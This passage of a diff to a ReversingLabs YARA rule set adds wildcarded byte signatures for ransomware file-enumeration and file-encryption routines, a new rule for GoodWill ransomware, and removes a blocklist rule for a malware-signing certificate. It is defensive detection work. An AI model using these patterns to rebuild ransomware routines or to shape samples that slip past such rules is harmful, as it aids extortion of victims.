+            C0 75 ?? 2B CA 8D 85 ?? ?? ?? ?? D1 F9 51 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ??
+            8B D7 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3 53 FF 15 ?? ?? ?? ?? A8
+            ?? 0F 85 ?? ?? ?? ?? EB ?? 8B 5D ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D6 83
+            C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 8B F0 89 75 ?? 83
+            FE ?? 0F 84 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 8D 51 ?? 0F 1F 80 ?? ?? ?? ?? 66 8B 01 83
+            C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81 F9 ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 8B 85 ?? ?? ??
+            ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? A8 ?? 0F 84 ?? ?? ??
+            ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66
+            3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F
+            84 ?? ?? ?? ?? 8D 4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66
+        }
+		$find_files_v1_p2 = {
+            8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8
+            ?? 85 C0 0F 84 ?? ?? ?? ?? 33 C0 53 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ??
+            ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 8D 8D ?? ?? ?? ?? 8B D7 E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 53
+            66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D
+            85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ?? ?? ?? 66 83
+            FF ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ??
+            51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? EB ?? 66 83 FF ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8
+            ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ??
+            ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 66 89 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 66 83 FF ?? 75 ?? 8D 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 33 F6 66 66 0F 1F 84 00
+            ?? ?? ?? ?? 80 BE ?? ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? 74 ?? 57 6A ?? 6A ?? 51 E8 ?? ??
+            ?? ?? 46 83 C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 57 E8 ?? ?? ?? ?? 8B 75 ?? 83 C4 ?? 56 FF
+            15 ?? ?? ?? ?? 5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_v1_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 51 53 81 EC ?? ?? ?? ?? 53 56 57 89 65
+            ?? 8B F9 89 7D ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 85 ?? ?? ?? ?? 0F 11 45 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 0F 13 45 ?? 66 0F 13
+            45 ?? 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ??
+            68 ?? ?? ?? ?? 57 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ??
+            8B F7 8D 4E ?? 0F 1F 00 66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 83 C6 ?? 89 75
+            ?? C7 45 ?? ?? ?? ?? ?? 33 C9 8B C6 BA ?? ?? ?? ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8
+            ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 33 C9 66 89 08 57 56 50 E8 ?? ?? ?? ?? 83 C4 ?? 68 ??
+            ?? ?? ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 8B 75 ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 56 8D 45 ?? 50 E8 ?? ?? ?? ?? 83
+            C4 ?? 83 7D ?? ?? 0F 8E ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 8B CA
+            89 4D ?? 85 C9 0F 8C ?? ?? ?? ?? 7F ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8B F8 89 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? BA ?? ?? ??
+            ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83 C4 ??
+            6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 57 FF 75 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? 8B C8 89 4D ?? 99 8B F0 89 75 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 81
+        }
+		$encrypt_files_v1_p2 = {
+            F9 ?? ?? ?? ?? 7E ?? B9 ?? ?? ?? ?? 8B F7 8D BD ?? ?? ?? ?? F3 A5 8D 45 ?? 50 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ??
+            ?? ?? ?? FF 75 ?? 8B 7D ?? 57 8B 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 85 ??
+            ?? ?? ?? 50 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 75 ?? 56 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ??
+            83 C4 ?? EB ?? 51 57 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 45
+            ?? 50 8D 85 ?? ?? ?? ?? 50 56 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
+            75 ?? 8D 85 ?? ?? ?? ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 03 C6 89 45 ??
+            8B 4D ?? 13 4D ?? 89 4D ?? 3B 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 45 ?? 0F 82 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? FF 75 ?? E8 ??
+            ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? 8B F0 89 75 ?? 56 51 8D 85 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 6A ?? 57 E8 ?? ?? ?? ?? 6A ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 89
+            45 ?? C7 45 ?? ?? ?? ?? ?? 8D 70 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 56 8B D0 8B
+            7D ?? 8B CF E8 ?? ?? ?? ?? 83 C4 ?? 56 8B 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ??
+            85 FF 74 ?? 8B CF E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 74 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 8B 7D ?? 8B 75 ?? 6A ?? 56 E8 ?? ?? ?? ?? 83 C4
+            ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 57 FF 15 ?? ?? ?? ?? 83 E0 ?? 50 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ??
+            ?? ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D 8B E3 5B C3
+        }
+		$find_files_v2_p1 = {
+            55 8B EC B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 53 8B C2 8B D9 89 45 ?? 89 5D ?? 56 57 66 83
+            F8 ?? 75 ?? 80 3D ?? ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ??
+            6A ?? 50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8B CB 89 45 ?? 83 C4 ?? 66 A1 ?? ?? ?? ?? 66
+            89 45 ?? 8D 51 ?? 66 0F 1F 44 00 ?? 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 81
+            F9 ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ??
+            ?? 0F B7 85 ?? ?? ?? ?? 8B F0 8D 48 ?? 8D 46 ?? 66 83 F9 ?? 0F B7 D0 8B CE 8B C6 0F
+            47 D0 0F B7 03 0F B7 FA 8B D0 83 C0 ?? 0F B7 D8 66 83 F8 ?? 8B C6 76 ?? 0F B7 F0 83
+            FB ?? 8D 42 ?? 0F B7 C8 8B C2 0F 47 C8 66 3B F9 8B 3D ?? ?? ?? ?? 0F 85 ?? ?? ?? ??
+            68 ?? ?? ?? ?? 56 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 8B 5D ?? 83 C4 ?? 0F B7
+            03 8B F0 8B C8 83 C1 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0 8B C6 0F 47 D0 0F B7 85 ?? ??
+            ?? ?? 8B C8 66 89 13 8D 50 ?? 8D 41 ?? 66 83 FA ?? 0F B7 F0 8B C1 8B CB 0F 47 F0 66
+            89 B5 ?? ?? ?? ?? 8D 51 ?? 0F 1F 00 66 8B 01 83 C1 ?? 66 85 C0 75 ?? 2B CA D1 F9 83
+            F9 ?? 76 ?? 8D 85 ?? ?? ?? ?? 50 53 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 84 ?? ?? ?? ??
+            EB ?? 8B 5D ?? 53 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 FF D7 83 C4 ?? 8D 85 ?? ?? ??
+            ?? 50 8D 85 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 89 45 ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 8B
+            8D ?? ?? ?? ?? 8D 41 ?? 66 83 F8 ?? 77 ?? 8D 41 ?? 0F B7 F8 EB ?? 0F B7 F9 0F B7 03
+        }
+		$find_files_v2_p2 = {
+            8B F0 8B C8 83 C1 ?? 66 83 F9 ?? 8D 46 ?? 0F B7 D0 8B C6 0F 47 D0 66 3B FA 8B 95 ??
+            ?? ?? ?? 75 ?? 83 FA ?? 0F 84 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8D 70 ?? 66 8B 08 83 C0
+            ?? 66 85 C9 75 ?? 2B C6 D1 F8 3D ?? ?? ?? ?? 0F 87 ?? ?? ?? ?? 83 FA ?? 0F 84 ?? ??
+            ?? ?? 81 FA ?? ?? ?? ?? 0F 84 ?? ?? ?? ?? F6 C2 ?? 0F 84 ?? ?? ?? ?? 8D 4D ?? 8D 85
+            ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83
+            C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8D
+            4D ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51
+            ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 33 C0 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ??
+            ?? ?? ?? 33 C0 53 66 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ??
+            ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 55
+            ?? 8D 8D ?? ?? ?? ?? 83 C4 ?? E8 ?? ?? ?? ?? E9 ?? ?? ?? ?? 33 C0 53 66 89 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ??
+            50 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 66 83 F8
+        }
+		$find_files_v2_p3 = {
+            75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 0F 85 ?? ??
+            ?? ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 51 8D
+            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? 83 C4 ?? EB ?? 66 83 F8 ?? 75 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 85 C0 74 ?? 83 EC ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ??
+            ?? 50 FF 75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? 53 66 89 85 ?? ?? ?? ?? 8D
+            85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ??
+            ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B 45 ?? 83 C4 ?? 66 83 F8 ?? 75 ?? 8D 85 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 8B F8 83 C4 ?? 85 FF 74 ?? 33 F6 0F 1F 00
+            80 BE ?? ?? ?? ?? ?? 8D 8E ?? ?? ?? ?? 74 ?? 57 6A ?? 6A ?? 51 E8 ?? ?? ?? ?? 46 83
+            C4 ?? 81 FE ?? ?? ?? ?? 7C ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? FF 15 ?? ?? ?? ??
+            5F 5E 5B 8B E5 5D C3
+        }
+		$encrypt_files_v2_p1 = {
+            53 8B DC 83 EC ?? 83 E4 ?? 83 C4 ?? 55 8B 6B ?? 89 6C 24 ?? 8B EC 6A ?? 68 ?? ?? ??
+            ?? 64 A1 ?? ?? ?? ?? 50 64 89 25 ?? ?? ?? ?? 51 53 81 EC ?? ?? ?? ?? 53 56 57 89 65
+            ?? 8B F1 89 75 ?? C7 45 ?? ?? ?? ?? ?? 0F 57 C0 0F 11 85 ?? ?? ?? ?? 0F 11 45 ?? C7
+            45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 66 0F 13 45 ?? 66 0F 13
+            45 ?? 66 0F 13 45 ?? C7 45 ?? ?? ?? ?? ?? C7 45 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 56 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4
+            ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ??
+            ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 8D 4E ?? 0F 1F 80 ?? ?? ?? ??
+            66 8B 06 83 C6 ?? 66 85 C0 75 ?? 2B F1 D1 FE 83 C6 ?? 89 75 ?? C7 45 ?? ?? ?? ?? ??
+            33 C9 8B C6 BA ?? ?? ?? ?? F7 E2 0F 90 C1 F7 D9 0B C8 51 E8 ?? ?? ?? ?? 83 C4 ?? 8B
+            F8 89 7D ?? 33 C0 66 89 07 FF 75 ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56
+            57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ?? ?? 56 57 E8 ?? ?? ?? ?? 83 C4 ?? 68 ?? ?? ??
+            ?? 6A ?? 68 ?? ?? ?? ?? 57 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 83 7D ?? ?? 0F 8E ??
+            ?? ?? ?? 57 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ??
+            8B CA 89 4D ?? 85 C9 0F 8C ?? ?? ?? ?? 7F ?? 85 C0 0F 84 ?? ?? ?? ?? 68 ?? ?? ?? ??
+            E8 ?? ?? ?? ?? 83 C4 ?? 8B F8 89 7D ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 45 ?? BA ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? BA ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 83
+            C4 ?? 6A ?? 8D 45 ?? 50 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 68 ?? ?? ?? ?? E8
+            ?? ?? ?? ?? 83 C4 ?? 90 68 ?? ?? ?? ?? 57 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B C8 89
+        }
+		$encrypt_files_v2_p2 = {
+            4D ?? 99 8B F0 89 75 ?? 89 55 ?? C7 45 ?? ?? ?? ?? ?? 81 F9 ?? ?? ?? ?? 7E ?? B9 ??
+            ?? ?? ?? 8B F7 8D BD ?? ?? ?? ?? F3 A5 8D 45 ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
+            68 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8B 7D ??
+            57 8B 75 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50 56 E8 ?? ?? ??
+            ?? 83 C4 ?? 8B 75 ?? 56 FF 75 ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 51 57 8D 85
+            ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 45 ?? 50 8D 45 ?? 50 8D 85 ?? ?? ?? ?? 50
+            56 8D 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 75 ?? 8D 85 ?? ?? ?? ?? 50
+            FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 03 C6 89 45 ?? 8B 4D ?? 13 4D ?? 89 4D ??
+            3B 4D ?? 0F 8C ?? ?? ?? ?? 7F ?? 3B 45 ?? 0F 82 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF
+            75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 6A ?? FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? E8 ?? ??
+            ?? ?? 8B F0 89 75 ?? 56 51 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 57 E8
+            ?? ?? ?? ?? 6A ?? 8B D7 8B CE E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? C7 45 ?? ?? ?? ?? ??
+            8D 70 ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? 56 8B D0 8B 7D ?? 8B CF E8 ?? ?? ?? ??
+            83 C4 ?? 56 8B 75 ?? 56 FF 75 ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 FF 74 ?? 8B CF E8 ?? ??
+            ?? ?? 8B 45 ?? 85 C0 74 ?? 6A ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 6A ?? 56 E8 ?? ?? ?? ??
+            83 C4 ?? 8B 7D ?? 6A ?? 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ??
+            ?? ?? 83 C4 ?? 8B 75 ?? 8B 45 ?? 85 C0 7E ?? 50 E8 ?? ?? ?? ?? 83 C4 ?? 56 E8 ?? ??
+            ?? ?? 83 C4 ?? B0 ?? 8B 4D ?? 64 89 0D ?? ?? ?? ?? 5F 5E 5B 8B E5 5D 8B E3 5B C3
+        }
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUS Software GmbH" and pe.signatures [ i ] . serial == "3a:d6:0c:ea:73:e1:dd:1a:3e:6c:02:d9:b3:39:c3:80" and 1567036800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and ( all of ( $manage_gui_p* ) ) and ( ( ( all of ( $find_files_v1_p* ) ) and ( all of ( $encrypt_files_v1_p* ) ) ) or ( ( all of ( $find_files_v2_p* ) ) and ( all of ( $encrypt_files_v2_p* ) ) ) )
 }
-
-rule REVERSINGLABS_Cert_Blocklist_7Df2Dfed47C6Fd6542131847Cffbc102 : INFO FILE
+rule REVERSINGLABS_Bytecode_MSIL_Ransomware_Goodwill : TC_DETECTION MALICIOUS MALWARE FILE
 {
 	meta:
-		description = "Certificate used for digitally signing malware."
+		description = "Yara rule that detects GoodWill ransomware."
 		author = "ReversingLabs"
-		id = "306444d8-7573-58c6-b6fe-14d701942275"
-		date = "2020-08-05"
-		modified = "2023-11-08"
+		id = "66358802-450b-5276-8088-b3550519b1e8"
+		date = "2022-06-28"
+		modified = "2022-06-28"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/certificate/blocklist.yara#L3360-L3376"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/yara/ransomware/ByteCode.MSIL.Ransomware.GoodWill.yara#L1-L89"
 		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e0a0be54aa1e11ccfd6854e4f19e9476f328fd84/LICENSE"
-		logic_hash = "fc6adbfd45ff6ac465aecb3db862421f02170e977fc044017f3ddc306a9f7a37"
+		logic_hash = "94e2950f415ba737fe5ca9d32a3d850dd5744e547c4ca094ad28545e19033cb2"
 		score = 75
 		quality = 90
-		tags = "INFO, FILE"
+		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "INFO"
+		category = "MALWARE"
+		tc_detection_type = "Ransomware"
+		tc_detection_name = "GoodWill"
+		tc_detection_factor = 5
 		importance = 25
 
+	strings:
+		$encrypt_file = {
+            02 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 0A 28 ?? ?? ?? ?? 06 6F
+            ?? ?? ?? ?? 0A 06 28 ?? ?? ?? ?? 0B 02 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 0C 02 72 ?? ?? ??
+            ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 08 07 28 ?? ?? ?? ?? 02 28 ?? ?? ?? ?? DE ?? 26 72 ??
+            ?? ?? ?? 28 ?? ?? ?? ?? DE ?? 2A
+        }
+		$aes_encrypt = {
+            14 0A 03 0B 73 ?? ?? ?? ?? 0C 73 ?? ?? ?? ?? 0D 09 20 ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 20
+            ?? ?? ?? ?? 6F ?? ?? ?? ?? 03 07 20 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 09 11 ?? 09 6F ??
+            ?? ?? ?? 1E 5B 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 11 ?? 09 6F ?? ?? ?? ?? 1E 5B 6F ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 09 17 6F ?? ?? ?? ?? 08 09 6F ?? ?? ?? ?? 17 73 ?? ?? ?? ?? 13 ??
+            11 ?? 02 16 02 8E 69 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? DC 08 6F ?? ?? ?? ?? 0A DE ?? 09 2C ?? 09 6F ?? ?? ?? ?? DC 08 2C ?? 08 6F ??
+            ?? ?? ?? DC 06 2A
+        }
+		$find_files_p1 = {
+            28 ?? ?? ?? ?? 0A 1F ?? 28 ?? ?? ?? ?? 0B 18 8D ?? ?? ?? ?? 25 16 72 ?? ?? ?? ?? A2 25
+            17 72 ?? ?? ?? ?? A2 0C 06 0D 16 13 ?? 38 ?? ?? ?? ?? 09 11 ?? 9A 13 ?? 11 ?? 6F ?? ??
+            ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? DD ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11
+            ?? 28 ?? ?? ?? ?? 08 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 11 ?? 28 ?? ??
+            ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 11 ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 17 28 ?? ?? ??
+            ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ??
+            ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 19 6F ?? ?? ?? ?? 6F ??
+            ?? ?? ?? DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ?? ?? ??
+            ?? DC DE ?? 26 DE ?? 26 DE ?? 11 ?? 6F ?? ?? ?? ?? 2D ?? DE ?? 11 ?? 2C ?? 11 ?? 6F ??
+            ?? ?? ?? DC 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 2B ?? 73 ?? ?? ?? ?? 13 ??
+            11 ?? 11 ?? 6F ?? ?? ?? ?? 7D ?? ?? ?? ?? 11 ?? FE 06 ?? ?? ?? ?? 73 ?? ?? ?? ?? 73 ??
